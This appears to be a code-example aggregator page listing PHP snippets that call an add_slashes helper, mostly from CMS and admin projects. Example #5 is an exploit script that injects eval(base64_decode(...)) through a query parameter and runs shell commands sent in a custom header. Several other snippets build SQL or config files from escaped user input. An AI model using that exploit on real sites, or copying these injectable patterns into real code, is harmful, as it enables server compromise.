예제 #1
0
 /**
  * Метод отображения дополнительных настроек
  *
  */
 function settingsCase()
 {
     global $AVE_Template;
     if ($_REQUEST['dop']) {
         $set = '<?';
         foreach ($_REQUEST['GLOB'] as $k => $v) {
             switch ($GLOBALS['CMS_CONFIG'][$k]['TYPE']) {
                 case 'bool':
                     $v = $v ? 'true' : 'false';
                     break;
                 case 'integer':
                     $v = intval($v);
                     break;
                 case 'string':
                     $v = "'" . add_slashes($v) . "'";
                     break;
                 case 'dropdown':
                     $v = "'" . add_slashes($v) . "'";
                     break;
                 default:
                     $v = "'" . add_slashes($v) . "'";
                     break;
             }
             $set .= "\t//" . $GLOBALS['CMS_CONFIG'][$k]['DESCR'] . "\r\n";
             $set .= "\tdefine('" . $k . "'," . $v . ");\r\n\r\n";
         }
         $set .= '?>';
         file_put_contents(BASE_DIR . '/inc/config.inc.php', $set);
         reportLog($_SESSION['user_name'] . " - изменил дополнительные настройки системы", 2, 2);
     }
     $AVE_Template->assign('CMS_CONFIG', $GLOBALS['CMS_CONFIG']);
     $AVE_Template->assign('content', $AVE_Template->fetch('settings/settings_case.tpl'));
 }
예제 #2
0
function check_admin_login($login_arr)
{
    $login_arr = add_slashes($login_arr);
    $username = $login_arr[username];
    $password = sha1(SALT_VAR . $login_arr[password]);
    $roleid = $login_arr[roleid];
    //	$qry = "select * from admin where username='******' and password='******'";
    //	$row = mysql_query($qry);
    $row = single_row(ADMIN, "*", "roleid='" . $roleid . "' and`username`='" . $username . "' and `password`='" . $password . "'", "id", "desc", "", false);
    if ($row != false) {
        session_register($_SESSION[Adm_UserId]);
        session_register($_SESSION[Adm_RoleId]);
        session_register($_SESSION[Adm_Email]);
        session_register($_SESSION[Adm_UserNm]);
        session_register($_SESSION[Adm_Fname]);
        session_register($_SESSION[Adm_Lname]);
        $_SESSION[Adm_UserId] = $row[id];
        $_SESSION[Adm_RoleId] = $row[roleid];
        $_SESSION[Adm_Email] = $row[email];
        $_SESSION[Adm_UserNm] = $row[username];
        $_SESSION[Adm_Fname] = $row[fname];
        $_SESSION[Adm_Lname] = $row[lname];
        return true;
    } else {
        return false;
    }
}
예제 #3
0
 public function down()
 {
     $statement = DBManager::get()->prepare("\n            SELECT name FROM `fleximport_tables`\n        ");
     $statement->execute();
     foreach ($statement->fetch(PDO::FETCH_COLUMN, 0) as $table_name) {
         DBManager::get()->exec("\n                DROP TABLE IF EXISTS `" . add_slashes($table_name) . "`;\n            ");
     }
     DBManager::get()->exec("\n\t        DROP TABLE IF EXISTS `fleximport_tables`;\n\t    ");
 }
예제 #4
0
파일: init.php 프로젝트: laiello/avecms
/**
 * Слешевание (для глобальных массивов)
 * рекурсивно обрабатывает вложенные массивы
 *
 * @param array $array обрабатываемый массив
 * @return array обработанный массив
 */
function add_slashes($array)
{
    reset($array);
    while (list($key, $val) = each($array)) {
        if (is_string($val)) {
            $array[$key] = addslashes($val);
        } elseif (is_array($val)) {
            $array[$key] = add_slashes($val);
        }
    }
    return $array;
}
예제 #5
0
function main()
{
    // :)
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Hey ya :)
    head();
    // Target
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    $byp = "1');";
    // PHP code
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Welcome guess !
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =]
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result
        $res = explode($s_sep, $web->getcontent());
        // Erf
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
예제 #6
0
function upd_rec($tab, $array, $where = "1=1", $disp = false)
{
    $array = add_slashes($array);
    $qry = "update {$tab} set ";
    if (count($array) > 0) {
        foreach ($array as $k => $v) {
            $qry .= "{$k}='" . $v . "',";
        }
    }
    $qry = trim($qry, ",") . " where " . $where;
    if ($disp) {
        echo $qry;
    }
    $err = mysql_query($qry);
    if (!$err) {
        echo mysql_error() . " - <b>" . $qry . "</b>";
        return false;
    } else {
        return true;
    }
}
예제 #7
0
function add_slashes($string)
{
    if (!$GLOBALS['magic_quotes_gpc']) {
        if (is_array($string)) {
            foreach ($string as $key => $val) {
                $string[$key] = add_slashes($val);
            }
        } else {
            $string = addslashes($string);
        }
    }
    return $string;
}
예제 #8
0
파일: action.php 프로젝트: kong-qi/lexiu
<?php

session_start();
require "base.inc.php";
$data = $_POST;
$data = guolv(add_slashes($data));
switch ($data['action']) {
    case 'user_up':
        unset($data['action']);
        if ($conn->post_update("" . DB_EXT . "user", $data, "kq_uniqueid='" . $_COOKIE['uid'] . "'")) {
            echo 'ok';
        } else {
            echo '';
        }
        break;
    case 'ly_add':
        is_login(@$_COOKIE['uid'], 0);
        $data['kq_uuid'] = uuid();
        $data['kq_ctime'] = time();
        $data['kq_ip'] = $_SERVER["REMOTE_ADDR"];
        unset($data['action']);
        if ($conn->post_insert("" . DB_EXT . "fankui", $data)) {
            echo 'ok';
        } else {
            echo '';
        }
        break;
    case md5('user_add'):
        if ($data['chkfrom'] == @$_SESSION['add_input']) {
            $user = is_login(@$_COOKIE['uid']);
            unset($data['submit']);
예제 #9
0
          $edit_value = $last_name;
          break;
      case "email":
          $value = $email;
          $edit_value = $email;
          break;
      case "alternate email":
          $value = $alt_email;
          $edit_value = $alt_email;
          break;
      case "phone":
          $value = add_slashes($phone);
          $edit_value = $phone;
          break;
      case "mobile":
          $value = add_slashes($mobile);
          $edit_value = $mobile;
          break;
      case "message":
          $value = nl2br(ucfirst($message));
          $edit_value = $message;
          break;
  }
  echo display_contact($each_set->attribute, $value);
  echo generate_input($each_set->form_element, $each_set->options, $each_set->attribute, $each_set->searchable, $each_set->placeholder, $each_set->class_name, $each_set->style_name, $i, $each_set->is_required, $each->title_placeholder, $edit_value, "edit", $salutation);
  if ($i == 1) {
      ?>
 <div class="row dispRow">
     <div class="column small-2">
          <strong  class="radius" > E-mail</strong>
     </div>
예제 #10
0
 public function show_list($start = NULL, $limit = NULL)
 {
     try {
         $this->data['heading'] = addslashes(t("Manage Admin User"));
         //Package Name[@package] Panel Heading
         $this->session->unset_userdata('last_uri');
         //generating search query//
         $arr_session_data = $this->session->userdata("arr_session");
         if ($arr_session_data['searching_name'] != $this->data['heading']) {
             $this->session->unset_userdata("arr_session");
             $arr_session_data = array();
         }
         $search_variable = array();
         //Getting Posted or session values for search//
         $s_search = isset($_POST["h_search"]) ? $this->input->post("h_search") : $this->session->userdata("h_search");
         $search_variable["s_customer_name"] = $this->input->post("h_search") ? $this->input->post("s_customer_name") : $arr_session_data["s_customer_name"];
         //end Getting Posted or session values for search//
         $s_where = " WHERE n.i_user_type > 2  AND n.i_id != 1 ";
         if ($s_search == "advanced") {
             if ($search_variable["s_customer_name"] != "") {
                 $s_where .= " AND CONCAT(n.s_first_name,' ',n.s_last_name) LIKE '%" . add_slashes($search_variable["s_customer_name"]) . "%' ";
             }
             $arr_session = array();
             $arr_session["searching_name"] = $this->data['heading'];
             $arr_session["s_customer_name"] = $search_variable["s_customer_name"];
             $this->session->set_userdata("arr_session", $arr_session);
             $this->session->set_userdata("h_search", $s_search);
             $this->data["h_search"] = $s_search;
             $this->data["s_customer_name"] = $search_variable["s_customer_name"];
         } else {
             $s_where = " WHERE n.i_user_type > 2 AND n.i_id != 1";
             //
             //Releasing search values from session//
             $this->session->unset_userdata("arr_session");
             $this->session->unset_userdata("h_search");
             $this->data["h_search"] = $s_search;
             $this->data["s_customer_name"] = "";
             //end Storing search values into session//
         }
         unset($s_search, $arr_session, $search_variable);
         //Setting Limits, If searched then start from 0//
         if ($this->input->post("h_search")) {
             $start = 0;
         } else {
             $start = $this->uri->segment($this->i_uri_seg);
         }
         //end generating search query//
         //$this->i_admin_page_limit = 1;
         $limit = $this->i_admin_page_limit;
         $info = $this->mod_rect->fetch_multi($s_where, intval($start), $limit);
         $this->session->set_userdata('last_uri', $start);
         //Creating List view for displaying//
         $table_view = array();
         //Table Headers, with width,alignment//
         $table_view["caption"] = addslashes(t("Manage Admin User"));
         $table_view["total_rows"] = count($info);
         $table_view["total_db_records"] = $this->mod_rect->gettotal_info($s_where);
         $table_view["detail_view"] = false;
         //   to disable show details.
         $j = 0;
         $table_view["headers"][$j]["width"] = "30%";
         $table_view["headers"][$j]["align"] = "left";
         $table_view["headers"][$j]["val"] = addslashes(t("Name"));
         $table_view["headers"][++$j]["val"] = addslashes(t("Email"));
         $table_view["headers"][$j]["width"] = "25%";
         $table_view["headers"][$j]["align"] = "left";
         /*$table_view["headers"][++$j]["val"]		= addslashes(t("User Type"));
         		$table_view["headers"][$j]["width"]    	="20%";
         		$table_view["headers"][$j]["align"]    	="left";*/
         $table_view["headers"][++$j]["val"] = addslashes(t("Status"));
         $table_view["headers"][$j]["width"] = "10%";
         $table_view["headers"][$j]["align"] = "left";
         //end Table Headers, with width,alignment//
         //Table Data//
         for ($i = 0; $i < $table_view["total_rows"]; $i++) {
             $i_col = 0;
             $table_view["tablerows"][$i][$i_col++] = encrypt($info[$i]["i_id"]);
             $table_view["tablerows"][$i][$i_col++] = $info[$i]["s_first_name"] . ' ' . $info[$i]["s_last_name"] . '<br>(Username: '******')';
             $table_view["tablerows"][$i][$i_col++] = $info[$i]["s_email"];
             //$table_view["tablerows"][$i][$i_col++]	= $info[$i]["s_user_type"];
             if ($info[$i]["i_status"] == 1) {
                 $table_view["tablerows"][$i][$i_col++] = '<span class="label label-success" id="status_row_id_' . $info[$i]["i_id"] . '">Active</span>';
             } else {
                 $table_view["tablerows"][$i][$i_col++] = '<span class="label label-default" id="status_row_id_' . $info[$i]["i_id"] . '">Inactive</span>';
             }
             $action = '';
             if ($info[$i]["i_status"] == 1) {
                 $action .= '<a data-toggle="tooltip" data-placement="bottom" title="Make Inactive" class="glyphicon glyphicon-ok" id="approve_img_id_' . $info[$i]["i_id"] . '_inactive" href="javascript:void(0);" rel="make_inactive"></a>';
             } else {
                 $action .= '<a data-toggle="tooltip" data-placement="bottom" title="Make Active" class="glyphicon glyphicon-ban-circle" id="approve_img_id_' . $info[$i]["i_id"] . '_active" href="javascript:void(0);" rel="make_active"></a>';
             }
             if ($action != '') {
                 $table_view["rows_action"][$i] = $action;
             }
         }
         //end Table Data//
         unset($i, $i_col, $start, $limit);
         $this->data["table_view"] = $this->admin_showin_table($table_view, TRUE);
         //Creating List view for displaying//
         $this->data["search_action"] = $this->pathtoclass . $this->router->fetch_method();
         //used for search form action
         //echo $this->data["search_action"];
         $this->render();
         unset($table_view, $info);
     } catch (Exception $err_obj) {
         show_error($err_obj->getMessage());
     }
 }
예제 #11
0
파일: save.php 프로젝트: ravenii/guardocs
    $database_name = $_POST['database_name'];
}
// Get table prefix
// Find out if the user wants to install tables and data
if (isset($_POST['install_tables']) && $_POST['install_tables'] == 'true') {
    $install_tables = true;
} else {
    $install_tables = false;
}
// End database details code
// Begin company name code
// Get company name
if (!isset($_POST['company_name']) || $_POST['company_name'] == '') {
    set_error('Please enter a company name');
} else {
    $company_name = add_slashes($_POST['company_name']);
}
// End website company name
// Check if the user has entered a correct path
if (!file_exists(accounting_scheme())) {
    set_error('It appears the accounting scheme does not exist');
}
// Get admin email and validate it
if (!isset($_POST['admin_email']) || $_POST['admin_email'] == '') {
    set_error('Please enter an email for the Administrator account');
} else {
    if (eregi("^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}\$", $_POST['admin_email'])) {
        $admin_email = $_POST['admin_email'];
    } else {
        set_error('Please enter a valid email address for the Administrator account');
    }
예제 #12
0
파일: ac_add.php 프로젝트: kong-qi/lexiu
require_once FUN_PATH . "global.func.inc.php";
require_once CLASS_PATH . "class_alert.inc.php";
/*
传入类型
*/
if (isset($_POST['type'])) {
    $type = $_POST['type'];
} else {
    exit("非法操作");
}
$passarray = array(md5("weijintai"), md5("index_add"));
//是否追加"//"
if (in_array($type, $passarray)) {
    $data = $_POST;
} else {
    $data = add_slashes($_POST);
}
//为空的取消
foreach ($data as $key => $value) {
    if (is_array($value)) {
        $data[$key] = $value;
    } else {
        if ($value) {
            $data[$key] = trim($value);
        } elseif ($value == '') {
            unset($data[$key]);
        }
    }
}
switch ($type) {
    /*管理员权限添加*/
예제 #13
0
function my_serialize($data)
{
    return add_slashes(serialize(del_slashes($data)));
}
예제 #14
0
파일: common.php 프로젝트: haogm123/ydoa
define('TOA_ROOT', str_replace('\\', '/', substr(dirname(__FILE__), 0, -7)));
define('CACHE_ROOT', TOA_ROOT . 'cache/');
define('PHP_TIME', time());
@header("content-Type: text/html; charset=utf-8");
$mtime = explode(' ', microtime());
$starttime = $mtime[0] + $mtime[1];
require TOA_ROOT . 'include/function_cache.php';
require TOA_ROOT . 'include/function_version.php';
require TOA_ROOT . 'include/function_global.php';
define('template', TOA_ROOT . 'template/default/');
if (!get_magic_quotes_gpc()) {
    $_GET = add_slashes($_GET);
    $_POST = add_slashes($_POST);
    $_COOKIE = add_slashes($_COOKIE);
}
$_FILES = add_slashes($_FILES);
!$_SERVER['PHP_SELF'] && ($_SERVER['PHP_SELF'] = $_SERVER['SCRIPT_NAME']);
$superadmin = '';
require TOA_ROOT . 'config.php';
require TOA_ROOT . 'include/class_mysql.php';
require TOA_ROOT . 'include/class_user.php';
require TOA_ROOT . 'include/class_config.php';
require TOA_ROOT . 'include/function_common.php';
require TOA_ROOT . 'include/excel_writer.class.php';
require TOA_ROOT . 'include/class_Utility.php';
require TOA_ROOT . 'include/class_ugcode.php';
require TOA_ROOT . 'include/sms.class.php';
require TOA_ROOT . 'include/class_ads.php';
require TOA_ROOT . 'include/word.class.php';
$db = new Mysql();
$db->connect(DB_HOST, DB_USER, DB_PWD, DB_NAME, DB_PCONNECT);
예제 #15
0
    $database_name = $_POST['database_name'];
}
// Get table prefix
if (preg_match('/[^a-z0-9_]+/i', $_POST['table_prefix'])) {
    // contains invalid characters (only a-z, A-Z, 0-9 and _ allowed to avoid problems with table/field names)
    set_error('Only characters a-z, A-Z, 0-9 and _ allowed in table_prefix.', 'table_prefix');
} else {
    $table_prefix = $_POST['table_prefix'];
}
$install_tables = true;
// Begin website title code
// Get website title
if (!isset($_POST['website_title']) or $_POST['website_title'] == '') {
    set_error('Please enter a website title', 'website_title');
} else {
    $website_title = add_slashes($_POST['website_title']);
}
// End website title code
// Begin admin user details code
// Get admin username
if (!isset($_POST['admin_username']) or $_POST['admin_username'] == '') {
    set_error('Please enter a username for the Administrator account', 'admin_username');
} else {
    $admin_username = $_POST['admin_username'];
}
// Get admin email and validate it
if (!isset($_POST['admin_email']) or $_POST['admin_email'] == '') {
    set_error('Please enter an email for the Administrator account', 'admin_email');
} else {
    if (preg_match('/^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$/i', $_POST['admin_email'])) {
        $admin_email = $_POST['admin_email'];
예제 #16
0
function add_slashes($data)
{
    foreach ($data as $key => $value) {
        if (is_array($value)) {
            add_slashes($value);
        } else {
            if (!get_magic_quotes_gpc()) {
                $data[$key] = addslashes($value);
            } else {
                $data[$key] = $value;
            }
        }
    }
    return $data;
}
예제 #17
0
 /**
  * Creates a "SELECT FROM `table` WHERE .. conditions .." and returns the query results;
  * $conditions format: id=15&some_field='value' or as an array: array('id' => 15, 'some_field' => 'value')
  * $more_sql e.q. "ORDER BY id DESC"
  *
  * @param string $table
  * @param mixed $conditions
  * @param string $select_fields
  * @param string $more_sql
  * @return array
  */
 function sqlSelectAll($table, $conditions = 1, $select_fields = '*', $more_sql = '')
 {
     $where = [];
     if (is_array($conditions)) {
         foreach ($conditions as $field => $value) {
             if ($this->_auto_add_slashes && is_string($value)) {
                 $value = add_slashes($value);
             }
             $value = is_string($value) ? "'" . $value . "'" : $value;
             $where[] = "`{$field}`={$value}";
         }
     } else {
         $where = explode('&', $conditions);
     }
     // build the query
     $query = "SELECT {$select_fields} FROM {$table} WHERE " . join(" AND ", $where) . " " . $more_sql;
     return $this->sqlFetchAll($query);
 }